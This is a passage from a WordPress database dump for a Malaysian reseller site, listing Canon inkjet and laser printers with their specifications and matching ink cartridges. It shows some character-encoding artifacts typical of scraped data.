TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-24 10:03:07','2018-12-24 02:03:07','',1449,'https://bintara.com.my/blog/2018/12/24/1449-revision-v1/',0,'revision','',0),(2737,1,'2018-12-24 10:41:17','2018-12-24 02:41:17','[vfb id=9]','Get Quotation (Canon)','','publish','closed','closed','','get-quotation-canon','','','2018-12-24 10:43:21','2018-12-24 02:43:21','',0,'https://bintara.com.my/?page_id=2737',0,'page','',0),(2738,1,'2018-12-24 10:39:48','2018-12-24 02:39:48','[vfb id=9]','','','inherit','closed','closed','','2737-revision-v1','','','2018-12-24 10:39:48','2018-12-24 02:39:48','',2737,'https://bintara.com.my/blog/2018/12/24/2737-revision-v1/',0,'revision','',0),(2740,1,'2018-12-24 10:43:21','2018-12-24 02:43:21','[vfb id=9]','Get Quotation (Canon)','','inherit','closed','closed','','2737-revision-v1','','','2018-12-24 10:43:21','2018-12-24 02:43:21','',2737,'https://bintara.com.my/blog/2018/12/24/2737-revision-v1/',0,'revision','',0),(2742,1,'2018-12-24 11:21:25','2018-12-24 03:21:25','<h3>Injet Printers :-</h3>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td 